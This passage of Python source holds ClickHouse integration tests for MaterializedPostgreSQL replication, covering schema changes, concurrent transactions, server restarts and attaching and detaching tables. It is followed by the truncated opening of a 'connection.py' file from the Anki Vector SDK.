1;') 
assert(result == '0\t-32768\t-2147483648\t-9223372036854775808\t1.12345\t1.123456789\t2147483647\t9223372036854775807\t2000-05-12 12:12:12.012345\t2000-05-12\t0.2\t0.2\n') for i in range(10): col = random.choice(['a', 'b', 'c']) cursor.execute('UPDATE test_data_types SET {} = {};'.format(col, i)) cursor.execute('''UPDATE test_data_types SET i = '2020-12-12';'''.format(col, i)) check_tables_are_synchronized('test_data_types', 'id'); instance.query("INSERT INTO postgres_database.test_array_data_type " "VALUES (" "0, " "['2000-05-12', '2000-05-12'], " "['2000-05-12 12:12:12.012345', '2000-05-12 12:12:12.012345'], " "[[1.12345], [1.12345], [1.12345]], " "[[1.1234567891], [1.1234567891], [1.1234567891]], " "[[[0.11111, 0.11111]], [[0.22222, 0.22222]], [[0.33333, 0.33333]]], " "[[[1, 1], [1, 1]], [[3, 3], [3, 3]], [[4, 4], [5, 5]]], " "[[[[['winx', 'winx', 'winx']]]]], " "[[[1, NULL], [NULL, 1]], [[NULL, NULL], [NULL, NULL]], [[4, 4], [5, 5]]], " "[[[[NULL]]]], " "[]" ")") expected = ( "0\t" + "['2000-05-12','2000-05-12']\t" + "['2000-05-12 12:12:12.012345','2000-05-12 12:12:12.012345']\t" + "[[1.12345],[1.12345],[1.12345]]\t" + "[[1.1234567891],[1.1234567891],[1.1234567891]]\t" + "[[[0.11111,0.11111]],[[0.22222,0.22222]],[[0.33333,0.33333]]]\t" "[[[1,1],[1,1]],[[3,3],[3,3]],[[4,4],[5,5]]]\t" "[[[[['winx','winx','winx']]]]]\t" "[[[1,NULL],[NULL,1]],[[NULL,NULL],[NULL,NULL]],[[4,4],[5,5]]]\t" "[[[[NULL]]]]\t" "[]\n" ) check_tables_are_synchronized('test_array_data_type'); result = instance.query('SELECT * FROM test_database.test_array_data_type ORDER BY key;') assert(result == expected) drop_materialized_db() cursor.execute('drop table if exists test_data_types;') cursor.execute('drop table if exists test_array_data_type;') def test_load_and_sync_subset_of_database_tables(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 10 publication_tables = '' for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) create_postgres_table(cursor, 'postgresql_replica_{}'.format(i)); instance.query("INSERT INTO postgres_database.postgresql_replica_{} SELECT number, number from numbers(50)".format(i)) if i < int(NUM_TABLES/2): if publication_tables != '': publication_tables += ', ' publication_tables += table_name create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, settings=["materialized_postgresql_tables_list = '{}'".format(publication_tables)]) assert 'test_database' in instance.query('SHOW DATABASES') time.sleep(1) for i in range(int(NUM_TABLES/2)): table_name = 'postgresql_replica_{}'.format(i) assert_nested_table_is_created(table_name) result = instance.query('''SELECT count() FROM system.tables WHERE database = 'test_database';''') assert(int(result) == int(NUM_TABLES/2)) database_tables = instance.query('SHOW TABLES FROM test_database') for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) if i < int(NUM_TABLES/2): assert table_name in database_tables else: assert table_name not in database_tables instance.query("INSERT INTO postgres_database.{} SELECT 50 + number, {} from numbers(100)".format(table_name, i)) for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) if i < int(NUM_TABLES/2): check_tables_are_synchronized(table_name); drop_materialized_db() for i in range(NUM_TABLES): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) def 
test_changing_replica_identity_value(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() create_postgres_table(cursor, 'postgresql_replica'); instance.query("INSERT INTO postgres_database.postgresql_replica SELECT 50 + number, number from numbers(50)") create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) instance.query("INSERT INTO postgres_database.postgresql_replica SELECT 100 + number, number from numbers(50)") check_tables_are_synchronized('postgresql_replica'); cursor.execute("UPDATE postgresql_replica SET key=key-25 WHERE key<100 ") check_tables_are_synchronized('postgresql_replica'); drop_materialized_db() cursor.execute('drop table if exists postgresql_replica;') def test_clickhouse_restart(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 5 for i in range(NUM_TABLES): create_postgres_table(cursor, 'postgresql_replica_{}'.format(i)); instance.query("INSERT INTO postgres_database.postgresql_replica_{} SELECT number, {} from numbers(50)".format(i, i)) instance.query("CREATE DATABASE test_database ENGINE = MaterializedPostgreSQL('postgres1:5432', 'postgres_database', 'postgres', 'mysecretpassword')") for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) check_tables_are_synchronized(table_name); for i in range(NUM_TABLES): instance.query("INSERT INTO postgres_database.postgresql_replica_{} SELECT 50 + number, {} from numbers(50000)".format(i, i)) instance.restart_clickhouse() for i in range(NUM_TABLES): check_tables_are_synchronized('postgresql_replica_{}'.format(i)); drop_materialized_db() for i in range(NUM_TABLES): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) def test_replica_identity_index(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() create_postgres_table(cursor, 'postgresql_replica', template=postgres_table_template_3); cursor.execute("CREATE unique INDEX idx on postgresql_replica(key1, key2);") cursor.execute("ALTER TABLE postgresql_replica REPLICA IDENTITY USING INDEX idx") instance.query("INSERT INTO postgres_database.postgresql_replica SELECT number, number, number, number from numbers(50, 10)") create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) instance.query("INSERT INTO postgres_database.postgresql_replica SELECT number, number, number, number from numbers(100, 10)") check_tables_are_synchronized('postgresql_replica', order_by='key1'); cursor.execute("UPDATE postgresql_replica SET key1=key1-25 WHERE key1<100 ") cursor.execute("UPDATE postgresql_replica SET key2=key2-25 WHERE key2>100 ") cursor.execute("UPDATE postgresql_replica SET value1=value1+100 WHERE key1<100 ") cursor.execute("UPDATE postgresql_replica SET value2=value2+200 WHERE key2>100 ") check_tables_are_synchronized('postgresql_replica', order_by='key1'); cursor.execute('DELETE FROM postgresql_replica WHERE key2<75;') check_tables_are_synchronized('postgresql_replica', order_by='key1'); drop_materialized_db() cursor.execute('drop table if exists postgresql_replica;') def test_table_schema_changes(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, 
port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 5 for i in range(NUM_TABLES): create_postgres_table(cursor, 'postgresql_replica_{}'.format(i), template=postgres_table_template_2); instance.query("INSERT INTO postgres_database.postgresql_replica_{} SELECT number, {}, {}, {} from numbers(25)".format(i, i, i, i)) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, settings=["materialized_postgresql_allow_automatic_update = 1"]) for i in range(NUM_TABLES): instance.query("INSERT INTO postgres_database.postgresql_replica_{} SELECT 25 + number, {}, {}, {} from numbers(25)".format(i, i, i, i)) for i in range(NUM_TABLES): check_tables_are_synchronized('postgresql_replica_{}'.format(i)); expected = instance.query("SELECT key, value1, value3 FROM test_database.postgresql_replica_3 ORDER BY key"); altered_table = random.randint(0, 4) cursor.execute("ALTER TABLE postgresql_replica_{} DROP COLUMN value2".format(altered_table)) for i in range(NUM_TABLES): cursor.execute("INSERT INTO postgresql_replica_{} VALUES (50, {}, {})".format(i, i, i)) cursor.execute("UPDATE postgresql_replica_{} SET value3 = 12 WHERE key%2=0".format(i)) assert_nested_table_is_created('postgresql_replica_{}'.format(altered_table)) check_tables_are_synchronized('postgresql_replica_{}'.format(altered_table)) print('check1 OK') for i in range(NUM_TABLES): check_tables_are_synchronized('postgresql_replica_{}'.format(i)); for i in range(NUM_TABLES): if i != altered_table: instance.query("INSERT INTO postgres_database.postgresql_replica_{} SELECT 51 + number, {}, {}, {} from numbers(49)".format(i, i, i, i)) else: instance.query("INSERT INTO postgres_database.postgresql_replica_{} SELECT 51 + number, {}, {} from numbers(49)".format(i, i, i)) check_tables_are_synchronized('postgresql_replica_{}'.format(altered_table)); print('check2 OK') for i in range(NUM_TABLES): check_tables_are_synchronized('postgresql_replica_{}'.format(i)); for i in range(NUM_TABLES): cursor.execute('drop table postgresql_replica_{};'.format(i)) instance.query("DROP DATABASE test_database") for i in range(NUM_TABLES): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) def test_many_concurrent_queries(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 5 for i in range(NUM_TABLES): create_postgres_table(cursor, 'postgresql_replica_{}'.format(i)); instance.query('INSERT INTO postgres_database.postgresql_replica_{} SELECT number, number from numbers(10000)'.format(i)) n = [10000] query_pool = ['DELETE FROM postgresql_replica_{} WHERE (value*value) % 3 = 0;', 'UPDATE postgresql_replica_{} SET value = value - 125 WHERE key % 2 = 0;', 'DELETE FROM postgresql_replica_{} WHERE key % 10 = 0;', 'UPDATE postgresql_replica_{} SET value = value*5 WHERE key % 2 = 1;', 'DELETE FROM postgresql_replica_{} WHERE value % 2 = 0;', 'UPDATE postgresql_replica_{} SET value = value + 2000 WHERE key % 5 = 0;', 'DELETE FROM postgresql_replica_{} WHERE value % 3 = 0;', 'UPDATE postgresql_replica_{} SET value = value * 2 WHERE key % 3 = 0;', 'DELETE FROM postgresql_replica_{} WHERE value % 9 = 2;', 'UPDATE postgresql_replica_{} SET value = value + 2 WHERE key % 3 = 1;', 'DELETE FROM postgresql_replica_{} WHERE value%5 = 0;'] def attack(thread_id): print('thread {}'.format(thread_id)) k = 10000 for i in range(20): query_id = random.randrange(0, len(query_pool)-1) 
table_id = random.randrange(0, 5) # num tables # random update / delete query cursor.execute(query_pool[query_id].format(table_id)) print("table {} query {} ok".format(table_id, query_id)) # allow some thread to do inserts (not to violate key constraints) if thread_id < 5: print("try insert table {}".format(thread_id)) instance.query('INSERT INTO postgres_database.postgresql_replica_{} SELECT {}*10000*({} + number), number from numbers(1000)'.format(i, thread_id, k)) k += 1 print("insert table {} ok".format(thread_id)) if i == 5: # also change primary key value print("try update primary key {}".format(thread_id)) cursor.execute("UPDATE postgresql_replica_{} SET key=key%100000+100000*{} WHERE key%{}=0".format(thread_id, i+1, i+1)) print("update primary key {} ok".format(thread_id)) threads = [] threads_num = 16 for i in range(threads_num): threads.append(threading.Thread(target=attack, args=(i,))) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) for thread in threads: time.sleep(random.uniform(0, 1)) thread.start() n[0] = 50000 for table_id in range(NUM_TABLES): n[0] += 1 instance.query('INSERT INTO postgres_database.postgresql_replica_{} SELECT {} + number, number from numbers(5000)'.format(table_id, n[0])) #cursor.execute("UPDATE postgresql_replica_{} SET key=key%100000+100000*{} WHERE key%{}=0".format(table_id, table_id+1, table_id+1)) for thread in threads: thread.join() for i in range(NUM_TABLES): check_tables_are_synchronized('postgresql_replica_{}'.format(i)); count1 = instance.query('SELECT count() FROM postgres_database.postgresql_replica_{}'.format(i)) count2 = instance.query('SELECT count() FROM (SELECT * FROM test_database.postgresql_replica_{})'.format(i)) assert(int(count1) == int(count2)) print(count1, count2) drop_materialized_db() for i in range(NUM_TABLES): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) def test_single_transaction(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True, auto_commit=False) cursor = conn.cursor() create_postgres_table(cursor, 'postgresql_replica_0'); conn.commit() create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) assert_nested_table_is_created('postgresql_replica_0') for query in queries: print('query {}'.format(query)) cursor.execute(query.format(0)) time.sleep(5) result = instance.query("select count() from test_database.postgresql_replica_0") # no commit yet assert(int(result) == 0) conn.commit() check_tables_are_synchronized('postgresql_replica_0'); drop_materialized_db() cursor.execute('drop table if exists postgresql_replica_0;') def test_virtual_columns(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() create_postgres_table(cursor, 'postgresql_replica_0'); create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, settings=["materialized_postgresql_allow_automatic_update = 1"]) assert_nested_table_is_created('postgresql_replica_0') instance.query("INSERT INTO postgres_database.postgresql_replica_0 SELECT number, number from numbers(10)") check_tables_are_synchronized('postgresql_replica_0'); # just check that it works, no check with `expected` because _version is taken as LSN, which will be different each time. 
result = instance.query('SELECT key, value, _sign, _version FROM test_database.postgresql_replica_0;') print(result) cursor.execute("ALTER TABLE postgresql_replica_0 ADD COLUMN value2 integer") instance.query("INSERT INTO postgres_database.postgresql_replica_0 SELECT number, number, number from numbers(10, 10)") check_tables_are_synchronized('postgresql_replica_0'); result = instance.query('SELECT key, value, value2, _sign, _version FROM test_database.postgresql_replica_0;') print(result) instance.query("INSERT INTO postgres_database.postgresql_replica_0 SELECT number, number, number from numbers(20, 10)") check_tables_are_synchronized('postgresql_replica_0'); result = instance.query('SELECT key, value, value2, _sign, _version FROM test_database.postgresql_replica_0;') print(result) drop_materialized_db() cursor.execute('drop table if exists postgresql_replica_0;') def test_multiple_databases(started_cluster): drop_materialized_db('test_database_1') drop_materialized_db('test_database_2') NUM_TABLES = 5 conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=False) cursor = conn.cursor() create_postgres_db(cursor, 'postgres_database_1') create_postgres_db(cursor, 'postgres_database_2') conn1 = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True, database_name='postgres_database_1') conn2 = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True, database_name='postgres_database_2') cursor1 = conn1.cursor() cursor2 = conn2.cursor() create_clickhouse_postgres_db(cluster.postgres_ip, cluster.postgres_port, 'postgres_database_1') create_clickhouse_postgres_db(cluster.postgres_ip, cluster.postgres_port, 'postgres_database_2') cursors = [cursor1, cursor2] for cursor_id in range(len(cursors)): for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) create_postgres_table(cursors[cursor_id], table_name); instance.query("INSERT INTO postgres_database_{}.{} SELECT number, number from numbers(50)".format(cursor_id + 1, table_name)) print('database 1 tables: ', instance.query('''SELECT name FROM system.tables WHERE database = 'postgres_database_1';''')) print('database 2 tables: ', instance.query('''SELECT name FROM system.tables WHERE database = 'postgres_database_2';''')) create_materialized_db(started_cluster.postgres_ip, started_cluster.postgres_port, 'test_database_1', 'postgres_database_1') create_materialized_db(started_cluster.postgres_ip, started_cluster.postgres_port, 'test_database_2', 'postgres_database_2') cursors = [cursor1, cursor2] for cursor_id in range(len(cursors)): for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) instance.query("INSERT INTO postgres_database_{}.{} SELECT 50 + number, number from numbers(50)".format(cursor_id + 1, table_name)) for cursor_id in range(len(cursors)): for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) check_tables_are_synchronized( table_name, 'key', 'postgres_database_{}'.format(cursor_id + 1), 'test_database_{}'.format(cursor_id + 1)); for i in range(NUM_TABLES): cursor1.execute('drop table if exists postgresql_replica_{};'.format(i)) for i in range(NUM_TABLES): cursor2.execute('drop table if exists postgresql_replica_{};'.format(i)) drop_clickhouse_postgres_db('postgres_database_1') drop_clickhouse_postgres_db('postgres_database_2') drop_materialized_db('test_database_1') drop_materialized_db('test_database_2') def 
test_concurrent_transactions(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 6 for i in range(NUM_TABLES): create_postgres_table(cursor, 'postgresql_replica_{}'.format(i)); def transaction(thread_id): conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True, auto_commit=False) cursor_ = conn.cursor() for query in queries: cursor_.execute(query.format(thread_id)) print('thread {}, query {}'.format(thread_id, query)) conn.commit() threads = [] threads_num = 6 for i in range(threads_num): threads.append(threading.Thread(target=transaction, args=(i,))) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) for thread in threads: time.sleep(random.uniform(0, 0.5)) thread.start() for thread in threads: thread.join() for i in range(NUM_TABLES): check_tables_are_synchronized('postgresql_replica_{}'.format(i)); count1 = instance.query('SELECT count() FROM postgres_database.postgresql_replica_{}'.format(i)) count2 = instance.query('SELECT count() FROM (SELECT * FROM test_database.postgresql_replica_{})'.format(i)) print(int(count1), int(count2), sep=' ') assert(int(count1) == int(count2)) drop_materialized_db() for i in range(NUM_TABLES): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) def test_abrupt_connection_loss_while_heavy_replication(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 6 for i in range(NUM_TABLES): create_postgres_table(cursor, 'postgresql_replica_{}'.format(i)); def transaction(thread_id): if thread_id % 2: conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True, auto_commit=True) else: conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True, auto_commit=False) cursor_ = conn.cursor() for query in queries: cursor_.execute(query.format(thread_id)) print('thread {}, query {}'.format(thread_id, query)) if thread_id % 2 == 0: conn.commit() threads = [] threads_num = 6 for i in range(threads_num): threads.append(threading.Thread(target=transaction, args=(i,))) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) for thread in threads: time.sleep(random.uniform(0, 0.5)) thread.start() # Join here because it takes time for data to reach wal for thread in threads: thread.join() time.sleep(1) started_cluster.pause_container('postgres1') for i in range(NUM_TABLES): result = instance.query("SELECT count() FROM test_database.postgresql_replica_{}".format(i)) print(result) # Just debug started_cluster.unpause_container('postgres1') for i in range(NUM_TABLES): check_tables_are_synchronized('postgresql_replica_{}'.format(i)); for i in range(NUM_TABLES): result = instance.query("SELECT count() FROM test_database.postgresql_replica_{}".format(i)) print(result) # Just debug drop_materialized_db() for i in range(NUM_TABLES): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) def test_drop_database_while_replication_startup_not_finished(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 5 for i in range(NUM_TABLES): table_name = 
'postgresql_replica_{}'.format(i) create_postgres_table(cursor, table_name); instance.query("INSERT INTO postgres_database.{} SELECT number, number from numbers(100000)".format(table_name)) for i in range(6): create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) time.sleep(0.5 * i) drop_materialized_db() for i in range(NUM_TABLES): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) def test_restart_server_while_replication_startup_not_finished(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 5 for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) create_postgres_table(cursor, table_name); instance.query("INSERT INTO postgres_database.{} SELECT number, number from numbers(100000)".format(table_name)) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) time.sleep(0.5) instance.restart_clickhouse() for i in range(NUM_TABLES): check_tables_are_synchronized('postgresql_replica_{}'.format(i)); drop_materialized_db() for i in range(NUM_TABLES): cursor.execute('drop table postgresql_replica_{};'.format(i)) def test_abrupt_server_restart_while_heavy_replication(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 6 for i in range(NUM_TABLES): create_postgres_table(cursor, 'postgresql_replica_{}'.format(i)); def transaction(thread_id): if thread_id % 2: conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True, auto_commit=True) else: conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True, auto_commit=False) cursor_ = conn.cursor() for query in queries: cursor_.execute(query.format(thread_id)) print('thread {}, query {}'.format(thread_id, query)) if thread_id % 2 == 0: conn.commit() threads = [] threads_num = 6 for i in range(threads_num): threads.append(threading.Thread(target=transaction, args=(i,))) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) for thread in threads: time.sleep(random.uniform(0, 0.5)) thread.start() # Join here because it takes time for data to reach wal for thread in threads: thread.join() instance.restart_clickhouse() for i in range(NUM_TABLES): result = instance.query("SELECT count() FROM test_database.postgresql_replica_{}".format(i)) print(result) # Just debug for i in range(NUM_TABLES): check_tables_are_synchronized('postgresql_replica_{}'.format(i)); for i in range(NUM_TABLES): result = instance.query("SELECT count() FROM test_database.postgresql_replica_{}".format(i)) print(result) # Just debug drop_materialized_db() for i in range(NUM_TABLES): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) def test_quoting(started_cluster): table_name = 'user' conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() create_postgres_table(cursor, table_name); instance.query("INSERT INTO postgres_database.{} SELECT number, number from numbers(50)".format(table_name)) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) check_tables_are_synchronized(table_name); drop_postgres_table(cursor, table_name) drop_materialized_db() def 
test_user_managed_slots(started_cluster): conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() table_name = 'test_table' create_postgres_table(cursor, table_name); instance.query("INSERT INTO postgres_database.{} SELECT number, number from numbers(10000)".format(table_name)) slot_name = 'user_slot' replication_connection = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True, replication=True, auto_commit=True) snapshot = create_replication_slot(replication_connection, slot_name=slot_name) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, settings=["materialized_postgresql_replication_slot = '{}'".format(slot_name), "materialized_postgresql_snapshot = '{}'".format(snapshot)]) check_tables_are_synchronized(table_name); instance.query("INSERT INTO postgres_database.{} SELECT number, number from numbers(10000, 10000)".format(table_name)) check_tables_are_synchronized(table_name); instance.restart_clickhouse() instance.query("INSERT INTO postgres_database.{} SELECT number, number from numbers(20000, 10000)".format(table_name)) check_tables_are_synchronized(table_name); drop_postgres_table(cursor, table_name) drop_materialized_db() drop_replication_slot(replication_connection, slot_name) def test_add_new_table_to_replication(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 5 for i in range(NUM_TABLES): create_postgres_table(cursor, 'postgresql_replica_{}'.format(i)); instance.query("INSERT INTO postgres_database.postgresql_replica_{} SELECT number, {} from numbers(10000)".format(i, i)) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) check_tables_are_synchronized(table_name); result = instance.query("SHOW TABLES FROM test_database") assert(result == "postgresql_replica_0\npostgresql_replica_1\npostgresql_replica_2\npostgresql_replica_3\npostgresql_replica_4\n") table_name = 'postgresql_replica_5' create_postgres_table(cursor, table_name) instance.query("INSERT INTO postgres_database.{} SELECT number, number from numbers(10000)".format(table_name)) result = instance.query('SHOW CREATE DATABASE test_database') assert(result[:63] == "CREATE DATABASE test_database\\nENGINE = MaterializedPostgreSQL(") # Check without ip assert(result[-59:] == "\\'postgres_database\\', \\'postgres\\', \\'mysecretpassword\\')\n") result = instance.query_and_get_error("ALTER DATABASE test_database MODIFY SETTING materialized_postgresql_tables_list='tabl1'") assert('Changing setting `materialized_postgresql_tables_list` is not allowed' in result) result = instance.query_and_get_error("ALTER DATABASE test_database MODIFY SETTING materialized_postgresql_tables='tabl1'") assert('Database engine MaterializedPostgreSQL does not support setting' in result) instance.query("ATTACH TABLE test_database.{}".format(table_name)); result = instance.query("SHOW TABLES FROM test_database") assert(result == "postgresql_replica_0\npostgresql_replica_1\npostgresql_replica_2\npostgresql_replica_3\npostgresql_replica_4\npostgresql_replica_5\n") check_tables_are_synchronized(table_name); instance.query("INSERT INTO postgres_database.{} SELECT number, number from numbers(10000, 10000)".format(table_name)) 
check_tables_are_synchronized(table_name); result = instance.query_and_get_error("ATTACH TABLE test_database.{}".format(table_name)); assert('Table test_database.postgresql_replica_5 already exists' in result) result = instance.query_and_get_error("ATTACH TABLE test_database.unknown_table"); assert('PostgreSQL table unknown_table does not exist' in result) result = instance.query('SHOW CREATE DATABASE test_database') assert(result[:63] == "CREATE DATABASE test_database\\nENGINE = MaterializedPostgreSQL(") assert(result[-180:] == ")\\nSETTINGS materialized_postgresql_tables_list = \\'postgresql_replica_0,postgresql_replica_1,postgresql_replica_2,postgresql_replica_3,postgresql_replica_4,postgresql_replica_5\\'\n") table_name = 'postgresql_replica_6' create_postgres_table(cursor, table_name) instance.query("INSERT INTO postgres_database.{} SELECT number, number from numbers(10000)".format(table_name)) instance.query("ATTACH TABLE test_database.{}".format(table_name)); instance.restart_clickhouse() table_name = 'postgresql_replica_7' create_postgres_table(cursor, table_name) instance.query("INSERT INTO postgres_database.{} SELECT number, number from numbers(10000)".format(table_name)) instance.query("ATTACH TABLE test_database.{}".format(table_name)); result = instance.query('SHOW CREATE DATABASE test_database') assert(result[:63] == "CREATE DATABASE test_database\\nENGINE = MaterializedPostgreSQL(") assert(result[-222:] == ")\\nSETTINGS materialized_postgresql_tables_list = \\'postgresql_replica_0,postgresql_replica_1,postgresql_replica_2,postgresql_replica_3,postgresql_replica_4,postgresql_replica_5,postgresql_replica_6,postgresql_replica_7\\'\n") result = instance.query("SHOW TABLES FROM test_database") assert(result == "postgresql_replica_0\npostgresql_replica_1\npostgresql_replica_2\npostgresql_replica_3\npostgresql_replica_4\npostgresql_replica_5\npostgresql_replica_6\npostgresql_replica_7\n") for i in range(NUM_TABLES + 3): table_name = 'postgresql_replica_{}'.format(i) check_tables_are_synchronized(table_name); for i in range(NUM_TABLES + 3): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) def test_remove_table_from_replication(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 5 for i in range(NUM_TABLES): create_postgres_table(cursor, 'postgresql_replica_{}'.format(i)); instance.query("INSERT INTO postgres_database.postgresql_replica_{} SELECT number, {} from numbers(10000)".format(i, i)) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) check_tables_are_synchronized(table_name); result = instance.query("SHOW TABLES FROM test_database") assert(result == "postgresql_replica_0\npostgresql_replica_1\npostgresql_replica_2\npostgresql_replica_3\npostgresql_replica_4\n") result = instance.query('SHOW CREATE DATABASE test_database') assert(result[:63] == "CREATE DATABASE test_database\\nENGINE = MaterializedPostgreSQL(") assert(result[-59:] == "\\'postgres_database\\', \\'postgres\\', \\'mysecretpassword\\')\n") table_name = 'postgresql_replica_4' instance.query('DETACH TABLE test_database.{}'.format(table_name)); result = instance.query_and_get_error('SELECT * FROM test_database.{}'.format(table_name)) assert("doesn't exist" in result) result = instance.query("SHOW TABLES FROM test_database") assert(result == 
"postgresql_replica_0\npostgresql_replica_1\npostgresql_replica_2\npostgresql_replica_3\n") result = instance.query('SHOW CREATE DATABASE test_database') assert(result[:63] == "CREATE DATABASE test_database\\nENGINE = MaterializedPostgreSQL(") assert(result[-138:] == ")\\nSETTINGS materialized_postgresql_tables_list = \\'postgresql_replica_0,postgresql_replica_1,postgresql_replica_2,postgresql_replica_3\\'\n") instance.query('ATTACH TABLE test_database.{}'.format(table_name)); check_tables_are_synchronized(table_name); for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) check_tables_are_synchronized(table_name); result = instance.query('SHOW CREATE DATABASE test_database') assert(result[:63] == "CREATE DATABASE test_database\\nENGINE = MaterializedPostgreSQL(") assert(result[-159:] == ")\\nSETTINGS materialized_postgresql_tables_list = \\'postgresql_replica_0,postgresql_replica_1,postgresql_replica_2,postgresql_replica_3,postgresql_replica_4\\'\n") table_name = 'postgresql_replica_1' instance.query('DETACH TABLE test_database.{}'.format(table_name)); result = instance.query('SHOW CREATE DATABASE test_database') assert(result[:63] == "CREATE DATABASE test_database\\nENGINE = MaterializedPostgreSQL(") assert(result[-138:] == ")\\nSETTINGS materialized_postgresql_tables_list = \\'postgresql_replica_0,postgresql_replica_2,postgresql_replica_3,postgresql_replica_4\\'\n") for i in range(NUM_TABLES): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) if __name__ == '__main__': cluster.start() input("Cluster created, press any key to destroy...") cluster.shutdown()
connection.py
# Copyright (c) 2018 Anki, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License in the file LICENSE.txt or at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Management of the connection to and from Vector. """ # __all__ should order by constants, event classes, other classes, functions. __all__ = ['ControlPriorityLevel', 'Connection', 'on_connection_thread'] import asyncio from concurrent import futures from enum import Enum import functools import inspect import logging import platform import sys import threading from typing import Any, Awaitable, Callable, Coroutine, Dict, List from google.protobuf.text_format import MessageToString import grpc import aiogrpc from . import util from 